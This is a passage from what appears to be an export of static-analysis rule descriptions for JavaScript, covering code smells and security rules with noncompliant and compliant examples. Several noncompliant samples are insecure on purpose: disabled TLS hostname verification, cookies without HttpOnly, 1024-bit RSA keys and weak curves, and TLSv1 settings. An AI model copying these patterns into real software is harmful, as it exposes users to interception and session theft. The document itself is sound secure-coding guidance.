(function () { // Ignored by this rule
  function open() {  // Classic function declaration; not ignored
    // ...
  }
  function read() {
    // ...
  }
  function readlines() {
    // ...
  }
})();
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5527</t>
  </si>
  <si>
    <t>Server hostnames should be verified during SSL/TLS connections</t>
  </si>
  <si>
    <t>&lt;p&gt;To establish a SSL/TLS connection not vulnerable to man-in-the-middle attacks, itâ€™s essential to make sure the server presents the right
certificate.&lt;/p&gt;
&lt;p&gt;The certificateâ€™s hostname-specific data should match the server hostname.&lt;/p&gt;
&lt;p&gt;Itâ€™s not recommended to re-invent the wheel by implementing custom hostname verification.&lt;/p&gt;
&lt;p&gt;TLS/SSL libraries provide built-in hostname verification functions that should be used.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/https.html"&gt;https&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method',
  checkServerIdentity: function() {} // Noncompliant: hostname is not verified
};
let req = https.request(options, (res) =&amp;gt; {
  res.on('data', (d) =&amp;gt; {
    process.stdout.write(d);
  });
}); // Noncompliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/tls.html"&gt;tls&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let options = {
    secureProtocol: 'TLSv1_2_method',
    checkServerIdentity: function() {}  // Noncompliant: hostname is not verified
};
let socket = tls.connect(443, "www.example.com", options, () =&amp;gt; {
  process.stdin.pipe(socket);
  process.stdin.resume();
});  // Noncompliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/request"&gt;request&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let socket = request.get({
    url: 'https://www.example.com',
    secureProtocol: 'TLSv1_2_method',
    checkServerIdentity: function() {}  // Noncompliant: hostname is not verified
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/https.html"&gt;https&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};
let req = https.request(options, (res) =&amp;gt; {
  res.on('data', (d) =&amp;gt; {
    process.stdout.write(d);
  });
}); // Compliant: default checkServerIdentity function is secure
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/tls.html"&gt;tls&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let options = {
    secureProtocol: 'TLSv1_2_method',
    checkServerIdentity: (servername, peer) =&amp;gt; {
        if (servername !== "www.example.com") {
            return new Error ('Error');  // Compliant: there is at least one check
        }
    }
};
let socket = tls.connect(443, "www.example.com", options, () =&amp;gt; {
  process.stdin.pipe(socket);
  process.stdin.resume();
}); // Compliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/request"&gt;request&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let socket = request.get({
    url: 'https://www.example.com/',
    secureProtocol: 'TLSv1_2_method' // Compliant
}); // Compliant:  default checkServerIdentity function is secure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href="https://cwe.mitre.org/data/definitions/297.html"&gt;MITRE, CWE-297&lt;/a&gt; - Improper Validation of Certificate with Host Mismatch &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1848</t>
  </si>
  <si>
    <t>Objects should not be created to be dropped immediately without being used</t>
  </si>
  <si>
    <t>&lt;p&gt;There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could
lead to an unexpected behavior in production.&lt;/p&gt;
&lt;p&gt;If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate method and called
directly.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
new MyConstructor(); // Non-Compliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var something = new MyConstructor();  // Compliant
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Immediately dropped new objects inside &lt;code&gt;try&lt;/code&gt;-statements are ignored.&lt;/p&gt;
&lt;pre&gt;
try {
  new MyConstructor();
} catch (e) {
  /* ... */
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2376</t>
  </si>
  <si>
    <t>Property getters and setters should come in pairs</t>
  </si>
  <si>
    <t>&lt;p&gt;When an object is created with a setter for a property but without a getter for that property, the property is inaccessible and is thus
useless.&lt;/p&gt;
&lt;p&gt;This rule also enforces the reverse situation (getter but no setter).&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var obj = {
    set foo(value) {
        this.fooval = value;
    }
};
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var obj = {
    set foo(value) {
        this.fooval = value;
    },
    get foo() {
        return this.fooval;
    }
};
&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;
var obj = {
    setFoo(value) {    // a standard method, not a setter
        this.fooval = value;
    }
};
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2259</t>
  </si>
  <si>
    <t>Properties of variables with "null" or "undefined" values should not be accessed</t>
  </si>
  <si>
    <t>&lt;p&gt;When a variable is assigned an &lt;code&gt;undefined&lt;/code&gt; or &lt;code&gt;null&lt;/code&gt; value, it has no properties. Trying to access properties of such a
variable anyway results in a &lt;code&gt;TypeError&lt;/code&gt;, causing abrupt termination of the script if the error is not caught in a &lt;code&gt;catch&lt;/code&gt;
block. But instead of &lt;code&gt;catch&lt;/code&gt;-ing this condition, it is best to avoid it altogether.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (x === undefined) {
  console.log(x.bar); // Noncompliant; TypeError will be thrown
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/476.html"&gt;MITRE, CWE-476&lt;/a&gt; - NULL Pointer Dereference &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S2137</t>
  </si>
  <si>
    <t>Special identifiers should not be bound or assigned</t>
  </si>
  <si>
    <t>&lt;p&gt;JavaScript has special identifiers that, while not reserved, still should not be used as identifiers. They include:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;code&gt;eval&lt;/code&gt; - evaluates a string as JavaScript code &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;arguments&lt;/code&gt; - used to access function arguments through indexed properties. &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;undefined&lt;/code&gt; - returned for values and properties that have not yet been assigned &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;NaN&lt;/code&gt; - Not a Number; returned when math functions fail. &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;Infinity&lt;/code&gt; - when a number exceeds the upper limit of the floating point numbers &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These words should not be bound or assigned, because doing so would overwrite the original definitions of these identifiers. Whatâ€™s more, assigning
or binding some of these names will generate an error in JavaScript strict mode code.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
eval = 17; // Noncompliant
arguments++; // Noncompliant
++eval; // Noncompliant
var obj = { set p(arguments) { } }; // Noncompliant
var eval; // Noncompliant
try { } catch (arguments) { } // Noncompliant
function x(eval) { } // Noncompliant
function arguments() { } // Noncompliant
var y = function eval() { }; // Noncompliant
var f = new Function("arguments", "return 17;"); // Noncompliant
function fun() {
  if (arguments.length == 0) { // Compliant
    // do something
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
result = 17;
args++;
++result;
var obj = { set p(arg) { } };
var result;
try { } catch (args) { }
function x(arg) { }
function args() { }
var y = function fun() { };
var f = new Function("args", "return 17;");
function fun() {
  if (arguments.length == 0) {
    // do something
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S124</t>
  </si>
  <si>
    <t>Track comments matching a regular expression</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule template can be used to create rules which will be triggered when a comment matches a given regular expression.&lt;/p&gt;
&lt;p&gt;For example, one can create a rule with the regular expression&amp;nbsp;&lt;code&gt;.*REVIEW.*&lt;/code&gt;&amp;nbsp;to match all comment containing "REVIEW".&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S5759</t>
  </si>
  <si>
    <t>Forwarding client IP address is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Users often connect to web servers through HTTP proxies.&lt;/p&gt;
&lt;p&gt;Proxy can be configured to forward the client IP address via the &lt;code&gt;X-Forwarded-For&lt;/code&gt; or &lt;code&gt;Forwarded&lt;/code&gt; HTTP headers.&lt;/p&gt;
&lt;p&gt;IP address is a personal information which can identify a single user and thus impact his privacy.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The web application uses reverse proxies or similar but doesnâ€™t need to know the IP address of the user. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;User IP address should not be forwarded unless the application needs it, as part of an authentication, authorization scheme or log management for
examples.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/http-party/node-http-proxy"&gt;node-http-proxy&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;
var httpProxy = require('http-proxy');
httpProxy.createProxyServer({target:'http://localhost:9000', xfwd:true}) // Noncompliant
  .listen(8000);
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://github.com/chimurai/http-proxy-middleware"&gt;http-proxy-middleware&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;
var express = require('express');
const { createProxyMiddleware } = require('http-proxy-middleware');
const app = express();
app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true, xfwd: true })); // Noncompliant
app.listen(3000);
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/http-party/node-http-proxy"&gt;node-http-proxy&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;
var httpProxy = require('http-proxy');
// By default xfwd option is false
httpProxy.createProxyServer({target:'http://localhost:9000'}) // Compliant
  .listen(8000);
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://github.com/chimurai/http-proxy-middleware"&gt;http-proxy-middleware&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;
var express = require('express');
const { createProxyMiddleware } = require('http-proxy-middleware');
const app = express();
// By default xfwd option is false
app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true})); // Compliant
app.listen(3000);
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A3-Sensitive_Data_Exposure.html"&gt;OWASP Top 10 2017 Category
  A3&lt;/a&gt; - Sensitive Data Exposure &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For"&gt;developer.mozilla.org&lt;/a&gt; - X-Forwarded-For &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S3330</t>
  </si>
  <si>
    <t>Creating cookies without the "HttpOnly" flag is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;When a cookie is configured with the &lt;code&gt;HttpOnly&lt;/code&gt; attribute set to &lt;em&gt;true&lt;/em&gt;, the browser guaranties that no client-side script will
be able to read it. In most cases, when a cookie is created, the default value of &lt;code&gt;HttpOnly&lt;/code&gt; is &lt;em&gt;false&lt;/em&gt; and itâ€™s up to the developer
to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target
the theft of session-cookies, the &lt;code&gt;HttpOnly&lt;/code&gt; attribute can help to reduce their impact as it wonâ€™t be possible to exploit the XSS
vulnerability to steal session-cookies.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; the cookie is sensitive, used to authenticate the user, for instance a &lt;em&gt;session-cookie&lt;/em&gt; &lt;/li&gt;
  &lt;li&gt; the &lt;code&gt;HttpOnly&lt;/code&gt; attribute offer an additional protection (not the case for an &lt;em&gt;XSRF-TOKEN cookie&lt;/em&gt; / CSRF token for example)
  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; By default the &lt;code&gt;HttpOnly&lt;/code&gt; flag should be set to &lt;em&gt;true&lt;/em&gt; for most of the cookies and itâ€™s mandatory for session /
  sensitive-security cookies. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/cookie-session"&gt;cookie-session&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let session = cookieSession({
  httpOnly: false,// Sensitive
});  // Sensitive
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/express-session"&gt;express-session&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const express = require('express'),
const session = require('express-session'),
let app = express()
app.use(session({
  cookie:
  {
    httpOnly: false // Sensitive
  }
})),
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/cookies"&gt;cookies&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let cookies = new Cookies(req, res, { keys: keys });
cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: false // Sensitive
}); // Sensitive
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/csurf"&gt;csurf&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');
let csrfProtection = csrf({ cookie: { httpOnly: false }}); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/cookie-session"&gt;cookie-session&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let session = cookieSession({
  httpOnly: true,// Compliant
});  // Compliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/express-session"&gt;express-session&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const express = require('express');
const session = require('express-session');
let app = express();
app.use(session({
  cookie:
  {
    httpOnly: true // Compliant
  }
}));
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/cookies"&gt;cookies&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
let cookies = new Cookies(req, res, { keys: keys });
cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: true // Compliant
}); // Compliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/csurf"&gt;csurf&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');
let csrfProtection = csrf({ cookie: { httpOnly: true }}); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/HttpOnly"&gt;OWASP HttpOnly&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)"&gt;OWASP Top 10 2017 Category A7&lt;/a&gt; - Cross-Site Scripting
  (XSS) &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/79.html"&gt;CWE-79&lt;/a&gt; - Improper Neutralization of Input During Web Page Generation ('Cross-site
  Scripting') &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/1004.html"&gt;CWE-1004&lt;/a&gt; - Sensitive Cookie Without 'HttpOnly' Flag &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat1"&gt;SANS Top 25&lt;/a&gt; - Insecure Interaction Between Components &lt;/li&gt;
  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://find-sec-bugs.github.io/bugs.htm#HTTPONLY_COOKIE"&gt;HTTPONLY_COOKIE&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S134</t>
  </si>
  <si>
    <t>Control flow statements "if", "for", "while", "switch" and "try" should not be nested too deeply</t>
  </si>
  <si>
    <t>&lt;p&gt;Nested &lt;code&gt;if&lt;/code&gt;, &lt;code&gt;for&lt;/code&gt;, &lt;code&gt;while&lt;/code&gt;, &lt;code&gt;switch&lt;/code&gt;, and &lt;code&gt;try&lt;/code&gt; statements are key ingredients for making
whatâ€™s known as "Spaghetti code".&lt;/p&gt;
&lt;p&gt;Such code is hard to read, refactor and therefore maintain.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;With the default threshold of 3:&lt;/p&gt;
&lt;pre&gt;
  if (condition1) {                  // Compliant - depth = 1
    /* ... */
    if (condition2) {                // Compliant - depth = 2
      /* ... */
      for(let i = 0; i &amp;lt; 10; i++) {  // Compliant - depth = 3, not exceeding the limit
        /* ... */
        if (condition4) {            // Non-Compliant - depth = 4
          if (condition5) {          // Depth = 5, exceeding the limit, but issues are only reported on depth = 4
            /* ... */
          }
          return;
        }
      }
    }
  }
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3696</t>
  </si>
  <si>
    <t>Literals should not be thrown</t>
  </si>
  <si>
    <t>&lt;p&gt;It is a bad practice to &lt;code&gt;throw&lt;/code&gt; something thatâ€™s not derived at some level from &lt;code&gt;Error&lt;/code&gt;. If you canâ€™t find an existing
&lt;code&gt;Error&lt;/code&gt; type that suitably conveys what you need to convey, then you should extend &lt;code&gt;Error&lt;/code&gt; to create one.&lt;/p&gt;
&lt;p&gt;Specifically, part of the point of throwing &lt;code&gt;Error&lt;/code&gt;s is to communicate about the conditions of the error, but literals have far less
ability to communicate meaningfully than &lt;code&gt;Error&lt;/code&gt;s because they donâ€™t include stacktraces.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
throw 404;                              // Noncompliant
throw "Invalid negative index.";        // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
throw new Error("Status: " + 404);
throw new Error("Invalid negative index.");{code}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1154</t>
  </si>
  <si>
    <t>Results of operations on strings should not be ignored</t>
  </si>
  <si>
    <t>&lt;p&gt;Doing an operation on a string without using the result of the operation is useless and is certainly due to a misunderstanding.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var str = "..."
str.toUpperCase(); // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var str = "..."
str = str.toUpperCase();
&lt;/pre&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated; use {rule:javascript:S2201} instead.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S5757</t>
  </si>
  <si>
    <t>Allowing confidential information to be logged is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Log management is an important topic, especially for the security of a web application, to ensure user activity, including potential attackers, is
recorded and available for an analyst to understand whatâ€™s happened on the web application in case of malicious activities.&lt;/p&gt;
&lt;p&gt;Retention of specific logs for a defined period of time is often necessary to comply with regulations such as GDPR, &lt;a
href="https://www.pcisecuritystandards.org/documents/Effective-Daily-Log-Monitoring-Guidance.pdf"&gt;PCI DSS&lt;/a&gt; and others. However, to protect userâ€™s
privacy, certain informations are forbidden or strongly discouraged from being logged, such as user passwords or credit card numbers, which obviously
should not be stored or at least not in clear text.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;p&gt;In a production environment:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; The web application uses confidential information and logs a significant amount of data. &lt;/li&gt;
  &lt;li&gt; Logs are externalized to SIEM or Big Data repositories. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Loggers should be configured with a list of confidential, personal information that will be hidden/masked or removed from logs.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;With &lt;a href="https://www.npmjs.com/package/signale"&gt;Signale log management framework&lt;/a&gt; the code is sensitive when an empty list of secrets is
defined:&lt;/p&gt;
&lt;pre&gt;
const { Signale } = require('signale');
const CREDIT_CARD_NUMBERS = fetchFromWebForm()
// here we suppose the credit card numbers are retrieved somewhere and CREDIT_CARD_NUMBERS looks like [1234-5678-0000-9999", "1234-5678-0000-8888"]; for instance
const options = {
  secrets: []         // empty list of secrets
};
const logger = new Signale(options); // Sensitive
CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;With &lt;a href="https://www.npmjs.com/package/signale"&gt;Signale log management framework&lt;/a&gt; it is possible to define a list of secrets that will be
hidden in logs:&lt;/p&gt;
&lt;pre&gt;
const { Signale } = require('signale');
const CREDIT_CARD_NUMBERS = fetchFromWebForm()
// here we suppose the credit card numbers are retrieved somewhere and CREDIT_CARD_NUMBERS looks like [1234-5678-0000-9999", "1234-5678-0000-8888"]; for instance
const options = {
  secrets: ["([0-9]{4}-?)+"]
};
const logger = new Signale(options); // Compliant
CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/532.html"&gt;CWE-532&lt;/a&gt; - Insertion of Sensitive Information into Log File &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A3-Sensitive_Data_Exposure.html"&gt;OWASP Top 10 2017 Category
  A3&lt;/a&gt; - Sensitive Data Exposure &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4426</t>
  </si>
  <si>
    <t>Cryptographic keys should be robust</t>
  </si>
  <si>
    <t>&lt;p&gt;Most of cryptographic systems require a sufficient key size to be robust against brute-force attacks.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar2.pdf"&gt;NIST recommendations&lt;/a&gt; will be checked for these
use-cases:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Digital Signature Generation&lt;/strong&gt; and &lt;strong&gt;Verification:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; p â‰¥ 2048 AND q â‰¥ 224 for DSA (&lt;code&gt;p&lt;/code&gt; is key length and &lt;code&gt;q&lt;/code&gt; the modulus length) &lt;/li&gt;
  &lt;li&gt; n â‰¥ 2048 for RSA (&lt;code&gt;n&lt;/code&gt; is the key length) &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Key Agreement&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; p â‰¥ 2048 AND q â‰¥ 224 for DH and MQV &lt;/li&gt;
  &lt;li&gt; n â‰¥ 224 for ECDH and ECMQV (Examples: &lt;code&gt;secp192r1&lt;/code&gt; is a non-compliant curve (&lt;code&gt;n&lt;/code&gt; &amp;lt; 224) but &lt;code&gt;secp224k1&lt;/code&gt; is
  compliant (&lt;code&gt;n&lt;/code&gt; &amp;gt;= 224)) &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Symmetric keys&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; key length â‰¥ 128 bits &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This rule will not raise issues for ciphers that are considered weak (no matter the key size) like &lt;code&gt;DES&lt;/code&gt;, &lt;code&gt;Blowfish&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/crypto.html"&gt;crypto&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
var { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
  modulusLength: 1024,  // Noncompliant
  publicKeyEncoding:  { type: 'spki', format: 'pem' },
  privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
}); // Noncompliant: 1024 bits is too short for a RSA key pair
crypto.generateKeyPair('ec', {
  namedCurve: 'secp112r2',
  publicKeyEncoding:  { type: 'spki', format: 'pem' },
  privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
}, callback); // Noncompliant: secp112r2 curve doesn't provide enough security
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/crypto.html"&gt;crypto&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
crypto.generateKeyPair('rsa', {
  modulusLength: 2048,  // Compliant
  publicKeyEncoding:  { type: 'spki', format: 'pem' },
  privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
}, callback); // Compliant
crypto.generateKeyPair('ec', {
  namedCurve: 'secp224k1',
  publicKeyEncoding:  { type: 'spki', format: 'pem' },
  privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
}, callback); // compliant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href="https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements"&gt;Mobile AppSec
  Verification Standard&lt;/a&gt; - Cryptography Requirements &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://owasp.org/www-project-mobile-top-10/2016-risks/m5-insufficient-cryptography"&gt;OWASP Mobile Top 10 2016 Category M5&lt;/a&gt; -
  Insufficient Cryptography &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf"&gt;NIST 800-131A&lt;/a&gt; - Recommendation for Transitioning the
  Use of Cryptographic Algorithms and Key Lengths &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/326.html"&gt;MITRE, CWE-326&lt;/a&gt; - Inadequate Encryption Strength &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4423</t>
  </si>
  <si>
    <t>Weak SSL/TLS protocols should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;This rule raises an issue when an insecure TLS protocol version (i.e. a protocol different from "TLSv1.2", "TLSv1.3", "DTLSv1.2", or "DTLSv1.3") is
used or allowed.&lt;/p&gt;
&lt;p&gt;It is recommended to enforce TLS 1.2 as the minimum protocol version and to disallow older versions like TLS 1.0. Failure to do so could open the
door to downgrade attacks: a malicious actor who is able to intercept the connection could modify the requested protocol version and downgrade it to a
less secure version.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;secureProtocol&lt;/code&gt;, &lt;code&gt;minVersion&lt;/code&gt;/&lt;code&gt;maxVersion&lt;/code&gt; and &lt;code&gt;secureOptions&lt;/code&gt; should not be set to use weak TLS
protocols (TLSv1.1 and lower):&lt;/p&gt;
&lt;pre&gt;
let options = {
  secureProtocol: 'TLSv1_method' // Noncompliant: TLS1.0 is insecure
};
let options = {
  minVersion: 'TLSv1.1',  // Noncompliant: TLS1.1 is insecure
  maxVersion: 'TLSv1.2'
};
let options = {
  secureOptions: constants.SSL_OP_NO_SSLv2 | constants.SSL_OP_NO_SSLv3 | constants.SSL_OP_NO_TLSv1
}; // Noncompliant TLS 1.1 (constants.SSL_OP_NO_TLSv1_1) is not disabled
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/https.html"&gt;https&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let req = https.request(options, (res) =&amp;gt; {
  res.on('data', (d) =&amp;gt; {
    process.stdout.write(d);
  });
});  // Noncompliant
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/tls.html"&gt;tls&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
let socket = tls.connect(443, "www.example.com", options, () =&amp;gt; { });  // Noncompliant
&lt;/pre&gt;
